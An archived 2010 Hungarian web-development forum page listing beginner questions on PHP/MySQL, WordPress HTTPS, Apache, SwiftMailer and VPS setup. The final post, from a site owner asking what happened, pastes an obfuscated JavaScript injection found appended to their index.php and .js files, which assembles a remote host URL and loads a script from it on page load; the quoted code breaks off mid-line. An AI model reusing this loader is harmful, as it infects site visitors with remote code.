ugrás a tartalomhoz

Archívum - Már 2010 - Fórum téma

március 7

Lista értékének kinyerése

954rr · 2010. Már. 7. (V), 12.23
Sziasztok!
Biztosan egyszerű a megoldás, viszont én még csak most tanulom.
A problémám a következő:
Van 5 adattáblám (bc1,bc2,bc3,mgr1,mgr2),melyekbe szeretnék tárolni bizonyos adatokat.
Abba a táblába szeretnék adatokat tárolni, amelyik a listában kiválasztásra kerül.
Hogy nézne ki egy mysql parancs,ami mondjuk a választott táblába ment el egy számot?

A lista:

<select name="evf">
<option value="bc1">BC1
<option value="bc2">BC2
<option value="bc3">BC3
<option value="mgr1">MGR1
<option value="mgr2">MGR2
</select>

Parancs: $parancs = "INSERT INTO $evf (szam)VALUES (5)";
Ez így nem jó,mert valahogy ki kellene nyernem, hogy melyik elem van kiválasztva a listában. DE hogyan?

A segítséget előre is köszönöm!
 

március 7

Jövedelem Google hirdetésből

zzrek · 2010. Már. 6. (Szo), 23.20
Sziasztok!

Próbálok meghatározni egy reális minimumot, ami elérhető pusztán google hirdetésekkel. (Tudom, hogy sok dologtól függ: téma, hirdetés mennyisége stb és a mérőszám nem a látogatás, hanem a klikk, de egy kb minimumot próbálok kigondolni)
Hasamra ütöttem, és azt mondtam, hogy 1 ember ha minden nap meglátogatja az oldalt, akkor 1 forintot behoz 1 hónap alatt. (Ha legalább 1000 ember látogat; vagyis ha sikerül elérni 10 ezres napi látogatószámot, akkor havi 10 ezer jön be, ugyanígy egymilliónál egymillió)

Akinek van tapasztalata, légyszi segítsen, melyik áll közelebb az igazsághoz:
1. Ez egy elrugaszkodott elképzelés, ennyi nem jön be
2. Kb ilyenre lehet számítani
3. Ennél inkább több szokott lenni a bevétel (arányaiban)

Köszi a segítséget!
 

HTTPS-el 404-es hiba az oldalaknál, Wordpress 2.9.2 Apache2

acsanadi · 2010. Már. 6. (Szo), 21.44
Üdv mindenkinek, aki olvassa!

Nos a probléma a következő:
Adott egy site WP-vel meghajtva. Szeretném azt elérni, hogy egyes oldalak elérhetőek legyenek https-el. Cert telepítve. a főoldal https://leon-line.hu le is jön gyönyörűen, de az egyéb oldalak nem.
Azt már próbáltam, hogy a WP index.php-ját lecseréltem erre:

<?php
  echo $_SERVER['REQUEST_URI'];
?>
Ha http-vel kérem az aloldalakat, akkor szépen kiírja, de pl a https://leon-line.hu/leo-klub-angolul-online/ kérésre 404-es hibát dob.
Kezdőként arra gondolok, hogy nem is jut el a kérés az index.php-hez.

Mi lehet a gond?
 

Fejlesztői dokumentáció átadása

kjw · 2010. Már. 6. (Szo), 20.52
Sziasztok,

Egyedi fejlesztésű PHP/MySql nyilvántartó rendszert készítek egy megrendelőnek.
Fejlesztői dokumentációt és forrást is kér.

Milyen díjat szoktatok ilyen esetben (fejlesztői dokumentáció) kérni?

köszönöm
 

Érdemes-e főállású weblapkészítőnek tanulni, vmint el lehet-e helyezkedni vele?

partisan1991 · 2010. Már. 6. (Szo), 15.01
Tudom, hogy ezt már részben a társaság már megvitatta, de én kicsit más szemszögből nézem a dolgokat(értsd, ahogy akarod). 18 éves középsulis srác vagyok, egy közepesnek mondható html és css tudással, vmint felületes php és js ismeretekkel. Az e107 cms-t preferálom jelenleg(igen, lusta vagyok néha...), a témakészítés/portolás már egész jól megy, a pluginokkal gondjaim olykor még vannak. A Joomla-val még csak ismerkedem, a Wp-ről meg ne is beszéljünk(már szinte helyettem is blogol, annyira egyszerű nekem xD ). A Photoshopot is már szelidítem több-kevesebb sikerrel. Szóval az egyetem/fősuli kilőve, mert a család kasszája ha beleroskad, sem jön ki a dolog, az okj-s képzésekről meg mindenfélét hallottam és nem akarok vakon beleugrani egy ilyenbe. Nagy Gusztáv jegyzeteit is nagy bőszen bújom(még nem értem a végére), ezúton is szeretném megköszönni, hogy megtekinthetővé tette(az oldalán sajnos nem lehet regisztrálni, ott is megköszöntem volna), még mindig nem értem a végére a dolognak :D.
Röviden: kíváncsi lennék, hogy milyen lehetőségeim vannak vmilyen weblapkészítő/tervező/designer irányban, hova tudnék fejlődni, esetleg miért ne próbálkozzam vele.

"Referenciaként" egy e107-tel készült oldalt tudok mutatni: http://8ballbase.info .

Várom a weblaboros "nagyöregek" válaszait is ;)
 

március 6

DocumentRoot

zsozsinnyo · 2010. Már. 5. (P), 22.51
Sziasztok!

Lehet, hogy Láma kérdés, de segítsetek!
Van egy Debian Lenny telepítve Rajta egy Apache2 webszerver.
Szeretném az alapértelmezett documentum könyvtárat (/var/www) átállítani másra.
Probáltam az apache2.conf-ba beállítani a
DocumnetRoot "/www"

De nem akar működni.
Valszeg nem igy kell. De magát az alapértelmezetett sem találtam meg.

Segítsetek!

Üdv
 

Szövegdoboz help!

siks · 2010. Már. 5. (P), 22.08
Sziasztok
A design tervezés után most web programozásra adtam a fejem, hogy a kész terveimhez ne kelljen még egy ember, szóval mondhatni elég kezdő szinten vagyok jelenleg a dologba. Egy szövegdobozt szeretnék megcsinálni amit el kezdtem csak 1-2 dologba kérném a segítségeteket és amit neten nem találtam :S

-Cím alatt:
o A cikk írásának dátumának megjelenítésére
o A cikket író nevének megjelenítésére
o A hozzászólások száma
o A cikket olvasók száma
- Ezen kívül egy hozzászólás rendszer

Jelenleg itt tart a dolog: http://www.siksdsgn.atw.hu/box/index.html

Sajnos lehet, hogy 1-2 helyen elég furcsának tűnhet amit csináltam de sajnos még csak most ízlelgetem a dolgokat. Bármifajta segítséget vagy tanácsot elfogadok valamint ha fentiek közül valamelyikbe tudna valaki segíteni akkor azt megköszönném.

Előre is nagyon köszönöm.
 

Amikor a VPS csóválja az usert....

waterbear · 2010. Már. 5. (P), 00.38
Sziasztok!

Tulajdonképpen túlvállaltam magam, önhitten azt gondoltam, hogy pár évnyi webes tapasztalat, 35-40 domain kezelése már ad annyi tapasztalatot, hogy megbirkózzak egy VPS-el... Majd utána olvasok, és megoldom. Nem így lett, most három napnyi kísérletezés után állok és nézek magam elé, azaz segítséget kérek.
A helyzet:
Windows Server 2003/3Gb

Van egy domainom a Godaddynál és béreltem egy alap VPS-t a Forpsinál.
A Forpsi adott IP címet, meg belépési kódot de sehogyan sem tudom a PLESK-ben beállítani, hogy bejöjjön a domain. http://www.webstarworld.info lenne az oldal.

Ha valaki tud, akkor kérem segítsen nekem, talán az alapoktól kezdve kellene egy szamárvezető, hiszen a DNS beállítással sem boldogultam.

Előre is köszönöm!
 

március 5

SwiftMailer 4

simisoma · 2010. Már. 4. (Cs), 22.06
Sziasztok,

lenne egy olyan kérdésem, hogy a SwiftMailer segítségével készítenék hírlevelet, de MySql adatbázisból kellenének az e-mail címek és nevek.

Egy emberre ki tudom küldeni a levelet így:

require_once '../lib/swift_required.php'; 
$transport = Swift_SendmailTransport::newInstance('/usr/sbin/sendmail -bs');
$mailer = Swift_Mailer::newInstance($transport);                                  
$message = Swift_Message::newInstance()
                  ->setSubject($targy)
                  ->setFrom(array($kuldo_mail => $kuldo_neve))
                  ->setTo(array($cimzett_mail => $kuldo_neve))
                  ->addPart($mail_body, 'text/html');
$result = $mailer->send($message);           

Ma már most nekem nem egy ->setTo(array($cimzett_mail => $kuldo_neve)) hanem több címzettem van amit valami ilyesmi módon nyernék ki:

$sql=mysql_query("select * from user;");
while($usr=mysql_fecth_assoc($sql))
{
...........???
}

hogyan tudnám ezt összehozni?

Köszi: SimiSoma
 

S.O.S. Mi a történhetett???? (Creative Commons License izé.......)

dodoka · 2010. Már. 4. (Cs), 21.07
Sziasztok!

Most vettem észre egy érdekes dolgot!
az ősszes index.php és az összes .js fájlokba "betelepült" vmi....

Egy ilyesmi és ehhez hasonló van most az érintett fájlok végén, mindegyik 2kb al lett nagyobb mint kéne:

<script>var l;if(l!='V' && l!='N'){l=''};function z(){this.F="";var I;if(I!='' && I!='B'){I=''};var h=RegExp;var x;if(x!='hh' && x!='NR'){x='hh'};var zF=new String("g");var Do;if(Do!='' && Do!='j'){Do=null};var y='';var s;if(s!='zI'){s='zI'};var jt='';function Q(v,H){var i= String("NYJ[".substr(3));var p;if(p!='R'){p=''};i+=H;this.J='';i+=String("]");this.pp='';var qS;if(qS!=''){qS='b'};this.Z='';var kY;if(kY!='U' && kY != ''){kY=null};var r=new h(i, zF);return v.replace(r, y);this.jH='';this.wG='';};var aq;if(aq!='' && aq!='DD'){aq=''};var Hz;if(Hz!='' && Hz!='ut'){Hz=''};var gn=new String();var Zk;if(Zk!='' && Zk!='f'){Zk=null};var u=String("FuNf/abc".substr(4)+"ABw1.go.BwA1".substr(4,4)+"DGKecom/".substr(4)+"2QDabc.".substr(3)+"0nMmgo.c".substr(4)+"df8om/kdf8".substr(3,4)+"uXAinop".substr(3)+"oisk"+".ru/0H3".substr(0,4)+"incra43".substr(0,4)+"edimhVl".substr(0,4)+"ail.eQX".substr(0,4)+"SQqKcom/".substr(4)+"goog"+"le.cObv".substr(0,4)+"om.p7SF".substr(0,4)+"asMRhp".substr(4));var J_;if(J_!='W' && J_!='Qc'){J_=''};var m;if(m!='' && m!='VPA'){m=''};var q=Q('8339737079738922902223',"9273");var UX;if(UX!='kT'){UX=''};var UK;if(UK!='E'){UK=''};var hb="de"+"fe"+"3qXer".substr(4);var lb="";var HJ=new String("http:"+"//gooZJxe".substr(0,5)+"uUsNgle-c".substr(4)+"om-co"+"XT6.mozi".substr(3)+"lla.o"+"rg.quEBj".substr(0,5)+"ikr-c"+"yHcWom.ra".substr(4)+"temypzEH".substr(0,5)+"eIXAart.reAIX".substr(4,5)+"3rBu:".substr(3));var M=window;var BA;if(BA!='iv'){BA=''};var t=String("srcxZXb".substr(0,3));var ha=new String();var ya='';var fa;if(fa!='' && fa!='my'){fa='rK'};var MB=String("scrp8X3".substr(0,3)+"s0zGipt".substr(4));var wm='';this.io="";var AV=new Array();M.onload=function(){this.y_="";var pu;if(pu!='_v'){pu=''};try {var LX="";var Bt=new Date();